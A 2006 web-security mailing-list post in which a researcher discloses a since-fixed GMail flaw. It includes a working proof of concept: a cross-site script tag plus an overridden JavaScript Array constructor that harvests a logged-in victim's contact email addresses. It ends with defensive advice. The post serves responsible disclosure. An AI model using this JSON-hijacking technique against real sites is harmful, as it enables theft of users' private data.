[WEB SECURITY] Advanced Web Attack Techniques using GMail
- From: Jeremiah Grossman <jeremiah@xxxxxxxxxxxxxxx>
- Subject: [WEB SECURITY] Advanced Web Attack Techniques using GMail
- Date: Fri, 27 Jan 2006 14:18:20 -0800
A few months ago, I discovered a vulnerability in GMail where it
became trivial to compromise someone's email contact list. I
demonstrated the issue to a friend at Google by emailing his GMail
account with a simple link. Upon clicking the link and viewing the
page, no XSS required, your contacts were displayed on screen (see
screenshot). From there the email addresses could be easily stolen.
Imagine if a spammer stumbled across this!
The issue was fixed within a few days, but the reason this particular
vulnerability was interesting is that the exploit techniques are a bit
different from those normally discussed. Also, I've been seeing the
scenario described below increasingly often in websites. Those
interested in browser security and AJAX development should take note.
Attack Details:
Assumes some knowledge of Cross-Site Request Forgeries, but with a
slight variation.
1) Email a GMail account a link and click.
example: http://foo/index.html
2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically
send an off-domain HTTP request to GMail. If the victim is logged-in
(obviously the case when you email a GMail account), the session
cookies will be sent along with the request, and the response
contains the contact list. The URL was predictable across all users.
Page URL: http://foo/index.html
<script src="http://mail.google.com/mail/?_url_scrubbed_"></script>
3) Sample content of http://mail.google.com/mail/?_url_scrubbed
The JavaScript line below contains an unreferenced array constant
with your contact list of email addresses.
[["ct","Your Name","foo@xxxxxxxxx"], ["ct","Another Name","bar@xxxxxxxxx"]]
GMail normally sends an XmlHttpRequest (XHR) to get this data on the
fly, where it's then eval'ed in the browser and assigned to a variable.
However, in our case the constant is loaded into JavaScript space on
(http://foo/index.html) using a script tag, so it's never assigned to
a variable. This means accessing the data requires something more.
4) Accessing the contact list
When JavaScript parses and interprets the unreferenced array, the
Array constructor is called. It's possible to overwrite the internal
Array constructor with our own to access the contact list. The new
Array constructor uses setters to trigger events, then parses out
the data we want, and prints the data to screen.
<script>
var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

// Replace the built-in Array constructor. This must run before the
// off-domain <script src="http://mail.google.com/mail/?_url_scrubbed_">
// is loaded, so the array literal in that response is built with this
// constructor rather than the native one.
function Array() {
  var obj = this;
  var ind = 0;
  var getNext;
  getNext = function(x) {
    // Non-standard Mozilla setter syntax of the time: re-arm a setter on
    // the next index so that every element assignment lands here.
    obj[ind++] setter = getNext;
    if (x) {
      var str = x.toString();
      // Skip the "ct" marker and nested arrays; keep strings containing '@'.
      if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) {
        var row = table.insertRow(-1);
        var td = row.insertCell(-1);
        td.innerHTML = str;
      }
    }
  };
  // The setter on index 0 fires when the first element is assigned.
  this[ind++] setter = getNext;
}

function readGMail() {
  document.body.appendChild(table);
}
</script>
<body onload="readGMail()">
Moral of the Story:
- Don't put sensitive data in pure JavaScript files. Wrap HTML tags
around the data to protect it from script tags.
- If JavaScript files must contain sensitive information, make the
URL unpredictable. And/Or...
- Make sure the file cannot be accessed by anything with an
off-domain referer.
Regards,
Jeremiah Grossman
Founder and CTO, WhiteHat Security, Inc.
www.whitehatsec.com
P.S.
From my experience Google is extremely responsive in handling
reported issues.
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
Brought to you by http://www.webappsec.org